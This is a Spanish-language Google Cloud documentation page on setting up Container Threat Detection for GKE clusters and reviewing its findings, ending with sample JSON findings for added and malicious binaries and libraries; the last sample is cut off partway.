Usa la detección de amenazas a contenedores

En esta página, se muestra cómo revisar los hallazgos de Container Threat Detection en la consola de Google Cloud. e incluye ejemplos de hallazgos de Container Threat Detection.

Container Threat Detection es un servicio integrado de los niveles Premium y Enterprise de Security Command Center.

Para ver los resultados de Container Threat Detection, el servicio debe estar habilitado en la configuración de Servicios de Security Command Center.

Obtén más información para ver y administrar los hallazgos de Container Threat Detection en Revisión de los resultados en esta página.

Para activar Container Threat Detection y otros detectores de nivel Premium en el a nivel de proyecto, consulta Activa Security Command Center para un proyecto. El nivel Enterprise no admite activaciones a nivel de proyecto.

Usa una versión de GKE compatible

Para detectar posibles amenazas en tus contenedores, asegúrate de que tus clústeres tengan una versión compatible de Google Kubernetes Engine (GKE). En este momento, la detección de amenazas a contenedores admite las siguientes versiones de GKE en los canales estables, regulares y rápidos:

  • GKE Standard >= 1.15.9-gke.12
  • GKE Standard >= 1.16.5-gke.2
  • GKE Standard >= 1.17
  • GKE Standard >= 1.18.10-gke.1400
  • GKE Standard >= 1.19.2-gke.2000
  • GKE Standard >= 1.20
  • GKE Standard >= 1.21
  • GKE Autopilot >= 1.21.11-gke.900
  • GKE Standard y Autopilot >= 1.22
  • GKE Standard y Autopilot >= 1.23

La detección de amenazas a contenedores solo admite imágenes de nodo de Container-Optimized OS.

Habilita Container Threat Detection

Cuando activas el nivel Premium o Enterprise de Security Command Center, Container Threat Detection es habilitado de forma predeterminada, a menos que decidas inhabilitarlo durante el proceso de activación.

Si necesitas habilitar o inhabilitar Container Threat Detection para tu organización o puedes hacerlo en la página Configuración de Security Command Center. Para más información, consulta Habilita o inhabilita un servicio integrado.

Cuando habilites Container Threat Detection, ya sea activando Security Command Center o más adelante, haz lo siguiente:

  1. Para cualquier clúster que no esté en una versión compatible de GKE, completa los pasos de la guía para actualizar un clúster.
  2. Asegúrate de que los clústeres tengan recursos suficientes disponibles para ejecutar Container Threat Detection DaemonSet.
  3. En la consola de Google Cloud, revisa el Configuración de habilitación del servicio Container Threat Detection para asegurarte de que Container Threat Detection esté habilitado en tus clústeres.

Permisos de IAM obligatorios

Container Threat Detection requiere permiso para habilitar e inhabilitar y administrar el agente de detección de amenazas a contenedores en GKE entre los clústeres de Kubernetes.

Para otorgar el permiso necesario, el rol de IAM Agente de servicio de Container Threat Detection Se debe otorgar (roles/containerthreatdetection.serviceAgent) al agente de servicio de Container Threat Detection, que es un tipo de cuenta de servicio.

Quitar este rol predeterminado del agente de servicio podría impedir que Container Threat Detection funcione de forma correcta.

Según cómo y cuándo se activó Security Command Center, el nombre del el agente de servicio que usa Container Threat Detection es diferente:

  • Si Security Command Center se activó antes del 7 de diciembre de 2023, Container Threat Detection usa el siguiente agente de servicio administrado por el usuario:

    service-PROJECT_NUMBER@gcp-sa-ktd-control.iam.gserviceaccount.com

  • Si Security Command Center se activó a nivel de la organización después del 7 de diciembre de 2023, Container Threat Detection usa el siguiente agente de servicio a nivel de la organización administrado por el usuario:

    service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

  • Si Security Command Center se activó a nivel de proyecto después del 7 de diciembre de 2023, Container Threat Detection usa el siguiente agente de servicio a nivel de la organización administrado por el usuario:

    service-project-PROJECT_NUMBER@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

Para obtener más información sobre los agentes de servicio y los roles de IAM, consulta lo siguiente:

Verifica la configuración del clúster de GKE

Para que Container Threat Detection funcione, si tu clúster está en una nube privada virtual (VPC), su red debe cumplir con los requisitos de enrutamiento, firewall y DNS para comunicarse con las API y los servicios de Google. Para acceder a las API de Google, revisa las siguientes guías:

Además, la configuración del clúster de GKE o las restricciones de la política de la organización no deben bloquear la creación o el uso de ningún objeto que Container Threat Detection necesite para funcionar. En las siguientes secciones, se incluye una lista de objetos de GKE que crea Container Threat Detection y se explica cómo configurar componentes esenciales de GKE para que funcionen con Container Threat Detection.

Objetos de Kubernetes

Después de la integración, Container Threat Detection crea varios objetos de GKE en tus clústeres habilitados. Los objetos se usan a fin de supervisar imágenes de contenedor, administrar Pods y contenedores privilegiados y evaluar el estado para generar resultados. En la siguiente tabla, se enumeran los objetos, sus propiedades y las funciones esenciales.

Objeto Nombre1 Propiedades Función
ClusterRole container-watcher-pod-reader Otorga los permisos get, watch y list en los pods.
ClusterRole pod-reader Otorga los permisos get, watch y list en los pods.
ClusterRoleBinding

container-watcher-pod-reader

gce:podsecuritypolicy:container-watcher

Otorga los roles container-watcher-pod-reader y gce:podsecuritypolicy:privileged a ServiceAccount de container-watcher-pod-reader
CustomResourceDefinition containerwatcherstatuses.containerthreatdetection.googleapis.com Informes de estado de DaemonSet
DaemonSet container-watcher2 Con privilegios Interacciones con el módulo de seguridad de Linux y Container Engine
Activa /host/ como lectura y escritura Comunicación con el módulo de seguridad de Linux
Activa /etc/container-watcher/secrets en modo de solo lectura para acceder a container-watcher-token Authentication
Usos hostNetwork Busca la generación
Imagen
gke.gcr.io/watcher-daemonset
Habilitación y actualización
Backend
containerthreatdetection-REGION.googleapis.com:443
Busca la generación
Rol container-watcher-status-reporter Rol con verbos get, list, watch, create, update y patch para la CustomResourceDefinition de containerwatcherstatuses.containerthreatdetection.googleapis.com Permite actualizar la información de estado de DaemonSet
RoleBinding gce:podsecuritypolicy:container-watcher Otorga la función gce:podsecuritypolicy:privileged a ServiceAccount de container-watcher-pod-reader. Conserva la funcionalidad cuando PodSecurityPolicy está habilitado
container-watcher-status-reporter Otorga la función container-watcher-status-reporter a ServiceAccount de container-watcher-pod-reader.
Secreto container-watcher-token Autenticación
ServiceAccount container-watcher-pod-reader Inhabilitación, actualización e inhabilitación

1 Todos los objetos están en el espacio de nombres kube-system, excepto container-watcher-pod-reader y gce:podsecuritypolicy:container-watcher.

2 Durante la instalación, actualización o eliminación de Container Threat Detection, Kubernetes podría emitir mensajes de error para objetos de Kubernetes y otras dependencias que actualmente faltan o están incompletos. Los errores se resuelven automáticamente cuando la detección de amenazas a contenedores completa la acción. A menos que los errores persistan más allá de algunos minutos, puedes ignorarlos.

PodSecurityPolicy y controladores de admisión

PodSecurityPolicy es un recurso de controlador de admisión que creas y que valida las solicitudes a fin de crear y actualizar los pods de tu clúster. Container Threat Detection es compatible con PodSecurityPolicies que se aplican de forma automática cuando se crea o actualiza un clúster con la marca enable-pod-security-policy. En particular, la detección de amenazas a Container Threat Detection gce.privileged cuando PodSecurityPolicy está habilitado.

Si usas PodSecurityPolicies personalizados o algún otro controlador de admisión, no deben bloquear la creación ni el uso de objetos para que Container Threat Detection funcione. Por ejemplo, un controlador de admisión basado en webhook que rechaza o anula implementaciones privilegiadas podría evitar que Container Threat Detection funcione de manera correcta.

Para obtener más información, consulta Usa PodSecurityPolicies.

Excluye variables de entorno de los hallazgos de Container Threat Detection

De forma predeterminada, cuando Container Threat Detection genera un hallazgo, informa el entorno. variables para todos los procesos a los que se hace referencia en el hallazgo. Variable de entorno pueden ser importantes cuando se investiga un ataque. Sin embargo, algunos paquetes de software almacenan secretos y otra información sensible en variables de entorno. Para evitar que Container Threat Detection incluya el entorno del proceso variables en cualquier hallazgo de Container Threat Detection, inhabilita módulo REPORT_ENVIRONMENT_VARIABLES con Google Cloud CLI o la API de Security Center Management securityCenterServices.patch a nivel de organización, carpeta o proyecto.

Por ejemplo, para inhabilitar los informes de variable de entorno en un proyecto, crea un llamado module_config.yaml con el siguiente contenido:

REPORT_ENVIRONMENT_VARIABLES:
  intendedEnablementState: DISABLED

Luego, ejecuta el siguiente comando:

gcloud scc manage services update container-threat-detection \
    --module-config-file=module_config.yaml \
    --project=PROJECT_ID

Para restablecer el comportamiento predeterminado, edita module_config.yaml de modo que contenga lo siguiente y, luego, vuelve a ejecutar el comando:

REPORT_ENVIRONMENT_VARIABLES:
  intendedEnablementState: ENABLED

Si quieres ver todos los comandos de gcloud CLI para administrar servicios, consulta gcloud scc manage services

Cómo excluir argumentos de la CLI de los resultados de Container Threat Detection

Todos los procesos tienen uno o más argumentos de línea de comandos (CLI). De forma predeterminada, cuando Container Threat Detection incluye detalles del proceso en un hallazgo, registra la CLI argumentos del proceso. Los valores de los argumentos de la CLI pueden ser importantes cuando se investiga un ataque. Sin embargo, algunos usuarios pueden pasar Secrets y otras información sensible en los argumentos de la CLI. Para evitar que la Detección de amenazas a contenedores incluidos los argumentos de la CLI de procesos en cualquier hallazgo de Container Threat Detection, inhabilita la módulo REPORT_CLI_ARGUMENTS con Google Cloud CLI o la API de Security Center Management securityCenterServices.patch a nivel de organización, carpeta o proyecto.

Por ejemplo, para inhabilitar los informes de argumentos de la CLI en un proyecto, crea un llamado module_config.yaml con el siguiente contenido:

REPORT_CLI_ARGUMENTS:
  intendedEnablementState: DISABLED

Luego, ejecuta el siguiente comando:

gcloud scc manage services update container-threat-detection \
    --module-config-file=module_config.yaml \
    --project=PROJECT_ID

Para restablecer el comportamiento predeterminado, edita module_config.yaml para que contenga lo siguiente y, luego, vuelve a ejecutar el comando:

REPORT_CLI_ARGUMENTS:
  intendedEnablementState: ENABLED

Para ver todos los comandos de la CLI de gcloud para administrar servicios, consulta gcloud scc manage services.

Uso de recursos

La detección de amenazas a contenedores está diseñada para ejercer un impacto de rendimiento insignificante en tus clústeres y no debería afectar la latencia en ninguna operación de clúster.

El uso de recursos depende de la carga de trabajo. Sin embargo, los componentes principales de la detección de amenazas a contenedores, el DaemonSet del espacio de usuario y el módulo de seguridad de Linux (LSM), tienen el siguiente impacto de rendimiento estimado:

  • DaemonSet: Un máximo de 0.125 CPU virtuales y 300 MB de memoria, según los límites estrictos establecidos para restringir el uso de recursos. En ocasiones, los límites se vuelven a evaluar y se pueden cambiar a fin de optimizar el rendimiento, en especial para nodos muy grandes.
  • LSM: Varía según las características de la carga de trabajo, pero en casos de estrés del LSM, observamos menos del 2% de la CPU y del 1% de la memoria. Puedes probar el impacto en el rendimiento si instrumentas las cargas de trabajo con y sin Container Threat Detection habilitada.

Si eres cliente de BigQuery, puedes habilitar la medición del uso de GKE para supervisar el uso de recursos del espacio de usuario DaemonSet de Container Threat Detection. Para ver el espacio de usuario DaemonSet en la medición de uso, busca el espacio de nombres kube-system y la etiqueta k8s-app=container-watcher.

La medición de uso de GKE no puede realizar un seguimiento del uso de CPU del kernel de forma específica para el LSM. Esos datos se incluyen en el uso general de la CPU.

API de Container Threat Detection

Container Threat Detection habilita de forma automática la API de containerThreatdetection durante la integración para permitir la generación de resultados. No debes interactuar directamente con esta API requerida. Inhabilitar esta API dañaría la capacidad de Container Threat Detection de generar resultados nuevos. Si deseas dejar de recibir los resultados de Container Threat Detection, inhabilita la detección de amenazas a contenedores en la configuración de servicios de Security Command Center.

Revisa los resultados

Cuando Container Threat Detection genera resultados, puedes verlos en Security Command Center. Si configuraste las exportaciones de registros a Cloud Logging, puedes consultar los resultados en Cloud Logging. Para generar un resultado y verificar la configuración, puedes activar de forma intencional un detector y probar la detección de amenazas a contenedores.

La detección de amenazas a contenedores tiene las siguientes latencias:

  • Latencia de activación de 3.5 horas para organizaciones o proyectos recién incorporados.
  • Latencia de activación de minutos para clústeres nuevos.
  • Latencia de detección de minutos para las amenazas en los clústeres que se activaron

Revisa los resultados en la consola de Google Cloud

Los roles de IAM para Security Command Center se pueden otorgar a nivel de la organización, a nivel de carpeta o proyecto. Tu capacidad para ver, editar, crear o actualizar resultados, recursos y fuentes de seguridad depende del nivel al que se te otorga acceso. Para obtener más información Para conocer los roles de Security Command Center, consulta Control de acceso.

Para revisar los resultados de la detección de amenazas a contenedores en Security Command Center, sigue estos pasos:

  1. En la consola de Google Cloud, ve a la página Resultados de Security Command Center.

    Ir a hallazgos

  2. Selecciona tu organización o proyecto de Google Cloud.
  3. En la sección Filtros rápidos, en la subsección Nombre visible de la fuente, selecciona Container Threat Detection. Los resultados de la búsqueda de resultados se actualizan para mostrar solo los los resultados obtenidos de esta fuente.
  4. Para ver los detalles de un hallazgo específico, haz clic en el nombre del hallazgo en Categoría. El del hallazgo, se abre el panel de detalles y se muestra la pestaña Resumen (Summary).
  5. En la pestaña Resumen, revisa los detalles del hallazgo, incluida la información sobre qué se detectó, el recurso afectado y, si están disponibles, los pasos que puedes realizar para corregir el hallazgo.
  6. Para ver la definición completa de JSON del resultado, haz clic en la pestaña JSON (opcional).

Para ayudarte en la investigación, los hallazgos de las amenazas también contienen vínculos a los siguientes recursos externos:

  • Entradas del framework de MITRE ATT&CK. En el framework, se explican las técnicas de los ataques a los recursos en la nube y se proporciona orientación para solucionarlos.
  • VirusTotal, un servicio propiedad de Alphabet que proporciona contexto sobre posibles ataques archivos, secuencias de comandos, URL y dominios.

Para obtener una lista de los resultados de Container Threat Detection, consulta Detectores de Container Threat Detection.

Visualiza los resultados en Cloud Logging

Para ver los resultados de Container Threat Detection en Cloud Logging, haz lo siguiente:

  1. Ve a la página Explorador de registros para Cloud Logging en la consola de Google Cloud.

    Ir al Explorador de registros

  2. En el Selector de proyectos en la parte superior de la página, selecciona el proyecto en el que almacenas los registros de Container Threat Detection.

  3. Haz clic en la pestaña Compilador de consultas.

  4. En la lista desplegable de recursos, selecciona Threat Detector.

    • Para ver los resultados de todos los detectores, selecciona all detection_name.
    • Para ver los resultados de un detector específico, selecciona su nombre.
  5. Como alternativa, ingresa resource.type="threat_detector" en el cuadro de texto del compilador de consultas y haz clic en Ejecutar consulta.

  6. La tabla se actualiza con los registros que seleccionaste.

  7. Crea consultas de registros avanzadas para especificar un conjunto de entradas de cualquier cantidad de registros.

Ejemplos de formatos de hallazgos

En esta sección, se incluyen los formatos JSON de los resultados de Container Threat Detection.

Estos ejemplos contienen los campos más comunes para todos los resultados. Sin embargo, es posible que no aparezcan todos los campos en todos los resultados. El resultado real que verás depende de la configuración de un recurso y del tipo y estado de los resultados. La información de Kubernetes y containerd se proporciona en función del mejor esfuerzo y no está garantizada.

Para obtener más información sobre los campos en cada hallazgo, consulta las descripciones de los campos en Recurso de REST: organizations.sources.findings.

Se ejecutó el objeto binario añadido

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Added Binary Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Added_Binary_Kind": "Added",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      },
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Process_Arguments": ["BINARY_PATH"],
      "Pod_Name": "POD_NAME",
      "description": "A binary that was not part of the original container image
      was executed. If an added binary is executed by an attacker, this is a
      possible sign that an attacker has control of the workload and they are
      executing arbitrary commands.",
      "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
      test-4af235e12be6f9d9", "HOME\u003d/root",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Added_Binary_Kind": {
        "primitiveDataType": "STRING"
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
    

Se cargó la biblioteca agregada

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findingsFINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Added Library Loaded",
    "sourceProperties": {
      "Process_Arguments": ["BINARY_PATH", "ADDED_LIBRARY_NAME"],
      "Parent_Pid": 1.0,
      "Container_Name": "CONTAINER_NAME",
      "Added_Library_Fullpath": "ADDED_LIBRARY_PATH",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Creation_Timestamp": {
        "seconds": 1.618004144E9,
        "nanos": 0.0
      },
      "Pod_Name": "POD_NAME",
      "Pid": 7.0,
      "description": "A library that was not part of the original container
      image was loaded. If an added library is loaded, this is a possible sign
      that an attacker has control of the workload and they are executing
      arbitrary code.",
      "VM_Instance_Name": "INSTANCE_ID",
      "Pod_Namespace": "default",
      "Environment_Variables": ["KUBERNETES_SERVICE_PORT\u003d443",
      "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT", "HOSTNAME\u003dsuspicious-
      library", "LD_LIBRARY_PATH\u003d/tmp", "PORT\u003d8080",
      "HOME\u003d/root", "PYTHONUNBUFFERED\u003d1",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
      ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
      , "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp", "LANG\u003dC.UTF-8",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/home/vmagent/app"],
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Added_Library_Kind": "Added",
      "Container_Image_Uri": "CONTAINER_IMAGE_uri"
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T21:36:13.069Z",
    "createTime": "2021-04-09T21:36:13.267Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Added_Library_Fullpath": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Added_Library_Kind": {
        "primitiveDataType": "STRING"
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "LOW",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Ejecución: Se ejecutó el binario malicioso agregado

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Added Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T19:51:22.538Z",
    "database": {},
    "eventTime": "2023-11-13T19:51:22.383Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/tmp/malicious-binary-dd922bc4ee3b49fd-should-trigger\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.68.2.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-test-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.68.2.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.68.2.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.68.2.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "added_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T19:51:06.618571329Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Ejecución: Se cargó la biblioteca maliciosa agregada

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Added Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:40:14.340Z",
    "database": {},
    "eventTime": "2023-11-13T21:40:14.209Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        },
        "libraries": [
          {
            "path": "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\"",
            "size": "68",
